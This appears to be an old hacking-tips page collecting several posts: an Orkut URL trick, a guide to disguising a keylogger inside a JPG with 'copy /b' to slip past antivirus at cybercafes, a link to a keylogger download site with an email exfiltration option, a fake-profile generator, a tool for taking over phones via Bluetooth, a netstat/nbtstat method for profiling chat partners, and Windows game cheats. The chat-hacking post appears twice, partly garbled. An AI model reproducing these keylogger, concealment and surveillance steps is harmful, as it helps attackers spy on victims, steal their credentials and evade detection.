View Friends Scrap more Than the Limit
Step1: Open Friends scrapbook
Step2: Look in your address bar (i.e the place where u type http://www.orkut.com). You will see this address written
http://www.orkut.com/Scrapbook.aspx?uid ... 8987654321
Step3: Add this code"&na=&nst=&nid=&pageSize=30" at the end of the address. It will look like this
http://www.orkut.com/Scrapbook.aspx?uid ... ageSize=30
30 over specifies that you can view 30 scraps of the scrapbook you are looking into.
View Friends Scrap more Than the Limit
keyloggers in photo
HERE ARE SOME KEYLOGS I RECOMEND SKL ITS A EASY ONE JUST DOWNLOAD IT
AND TRY TO LOAD IT...................
IN THE EMAIL OPTION GIV UR YAHOO ID AND SERVER USE YAHOO MAX4 ITS THE BEST THEN
hxxp://www.trojanfrance.com/index.php?dir=KeyLoggers/
replace xx to tt
now you are half way arround...................
Step 1: You will need two files - the file in which you have ur keylogger and one jpg image - it can be of any size or dimensions. [If you want to hide multiple files in one jpeg image, just zip them into one file]
Step 2: Copy the above two files to the C: folder and open the command prompt window.
Step 3:Move to the c: root by typing cd \ [if the files are in another folder, you'll have to change the prompt to that folder]
Step 4: The most important step - type the following command:
Code:
copy /b myimage.jpg + file.exe my_new_image.jpg
now the antivirus will not detect the keylogger take it to any cyber center as if he checks , the logger will be in the form of jpg .......................
To recover the original exe file, just rename my_new_image.jpg to filename.exe.
That's it - No advanced Steganography tricks involved here. Just remember to write the correct syntax of the copy command:
Code:
copy /b sourceimage.jpg + filetohide.exe targetimage.jpg
as some part of the trick i inherited but implementation no one would have thought it............................
any doubts bugs errors can be clarified as i have tried this trick...............100% working even today...............based on cmd commands only................
Fake Profile Maker!
Heres the Second Version
How to Use:
* Fill All The Details and Press Go
* Fill the Captcha on the Page
* Press I Accept on the Page
* Rest part, the Software will do
* And now please dont say tht its slow bcoz it depends on ur net speed
* Bug Fixed
Download Link:
http://rapidshare.com/files/65015008/Ga ... _.rar.html
or
http://solutionworld.co.in/Host/file.ph ... d852816184
ScreenShot:
http://i225.photobucket.com/albums/dd63 ... 11/scr.jpg
Enjoy!
Hacking pc while chating
I am not sure that this will work 100 %.
But yes will work almost 70 percent of the times.
But before that you need to know some few things of yahoo chat protocol
leave a comment here after u see the post lemme know if it does works or not or u having a problem post here.
Following are the features : -
1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has 2 options
a) Either it uploads the file and then the other client has to down load it.
Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server
Or it has client to client connection
And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remember i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.
So lets analyse
1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.
So why to wait lets exploit those 50 % chances .
I'll explain only for files here which lies same for Video or audio
1) Go to dos
type ->
netstat -n 3
You will get the following output.Just do not care and be cool
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->
2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established
HMMMM then the first attacker first phase is over
This is the output in your netstat.The 5101 number port is where the Attacker is connected.
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED
3) so what next???
Hmmm........ Ok so make a DOS attack now
Go to dos prompt and
Just do
nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.
C:\>nbtstat -A 194.30.209.14
Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
EDP12 <00> UNIQUE Registered
XYZ <00> GROUP Registered
XYZ <20> UNIQUE Registered
XYZCOMP1 <1e> GROUP Registered
MAC Address = 00-C0-W0-D5-EF-9A
What to do next??
It is now ur job to tell me what u have done next...
So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.
mobile bluetooth hacker
Yes guys it is the super mobile bluetooth hacker
Once connected to a another phone via bluetooth you can:
- read his messages
- read his contacts
- change profile
- play his ringtone even if phone is on silent
- play his songs(in his phone)
- restart the phone
- switch off the phone
- restore factory settings
- change ringing volume
- And here comes the best
Call from his phone" it includes all call functions like hold etc.
Notes:
1.) When connecting devices use a code 0000
2.) At start of programm on smartphones do not forget to turn on bluetooth before start of the application
What else you want
Just go and downlaod it
download
enjoy and keep visiting us
All windows games cheats and cracks
Minesweeper
Secret - Reveal Mines
Instructions - Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change you desktop background to a solid color other then white or black to see the pixel.
Pinball
Secret - Extra BallsInstructions - Type 1max at the start of a new ball to get extra balls.
Secret - Gravity WellInstructions - Type gmax at the start of a new game to activate the Gravity Well.
Secret - Instant PromotionInstructions - Type rmax at the start of a new game to go up in ranks.
Secret - Skill ShotInstructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points:
First: 15,000 pointsSecond: 30,000 pointsThird: 75,000 pointsFourth: 30,000 pointsFifth: 15,000 pointsSixth: 7,500 points
Secret - Test ModeInstructions - Type hidden test at the start of a new ball to activate Test Mode. No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around.
Secret - Unlimited BallsInstructions - Type bmax at the start of a new ball. No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restarting
FreeCell
Secret - Instant WinInstructions - Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win.
Secret - Hidden Game ModesInstructions - In the “Game” menu choose “Select Game”. Enter -1 or -2 to activate the hidden game modes.
Solitaire
Secret - Instant Win
Instructions - Press Alt + Shift + 2 during game play to instantly win.
Secret - Draw single cards in a Draw Three game
Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three cards you will only draw one.
Infinite Points
In the Windows XP version of solitaire, draw from the deck at least twice. Hold control and drag a card down from the deck. Click the “A” key and then let go of the left mouse key. You will get 10 points for this. Continue doing this for infinite points!
Infinite points trick II
To do this trick, finish a game of solitaire with the time bonus option on. The cards will start bouncing. Click on the solitaire screen and the play again box will pop up. Select no, so the solitaire screen is just blank green. Use the instant win cheat (Alt+Shift+2) and you will recieve the time bonus you got last game will be added to your last game’s score. For example, if your time bonus was 5000, and your final score was 6000, after using this glitch, you will have a score of 11000. This glitch can be used as many times as you want.
//—————————————————————–// registry hack which will allow you to see your opponents’ cards//—————————————————————– Launch REGEDIT.EXE and navigate to HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Applets Hearts. NOTE: You may have to create the Hearts key under Applets In the right-hand pane, create a new String Value. Immediately rename it to “ZB” (without the quotes); give it a value of “42″ (again, sans quotes). The next time you’re in a game of Hearts, press CTRL + SHIFT + ALT + F12.
hacking through yahoo
Hack a Yahoo Account While Chatting
This is only for education purpose.So who ever try this is at his risk.I am not sure that this will work 100 %.But yes will work almost 70 percent of the times.But before that you need to know some few things of yahoo chat protocolleave a comment here after u see the post lemme know if it does works or not or u havin a problem post here
Following are the features : -1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.2) When we send files yahoo has 2 optionsa) Either it uplo--- the file and then the other client has to down load it.b) Either it connects to the client directly and gets the files3) When we use video or audio:-a) It either goes thru the serverb) Or it has client to client connectionAnd when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remeber i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.So lets ----yse1) Its impossible to get a Attackers IP address when you only chat.2) There are 50 % chances of getting a IP address when you send files3) Again 50 % chances of getting IP when you use video or audio.
So why to wait lets exploit those 50 % chances.I will explain only for files here which lies same for Video or audio1) Go to dostype ->netstat -n 3You will get the following output.Just do not care and be coolActive Connections
Proto Local Address Foreign Address StateTCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHEDTCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHEDTCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHEDTCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Active Connections
Proto Local Address Foreign Address StateTCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHEDTCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHEDTCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHEDTCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->
2) Try sending a file to the Target .if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is establishedHMMMM then the first attacker first phase is overThis is the output in your netstat.The 5101 number port is where the Attacker is connected.Active Connections
Proto Local Address Foreign Address StateTCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHEDTCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHEDTCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHEDTCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHEDTCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED
Thats what is highlighted in RED. So what next3) Hmmm Ok so make a DOS attack nowGo to dos prompt andJust donbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.C:\>nbtstat -A 194.30.209.14
Local Area Connection:Node IpAddress: [194.30.209.15] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status---------------------------------------------EDP12 <00> UNIQUE RegisteredSHIV <00> GROUP RegisteredSHIV <20> UNIQUE RegisteredSHIVCOMP1 <1e> GROUP Registered
MAC Address = 00-C0-W0-D5-EF-9A
Ok so you will ask now what next.No you find what you can do with this network than me explaining everything.
So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.










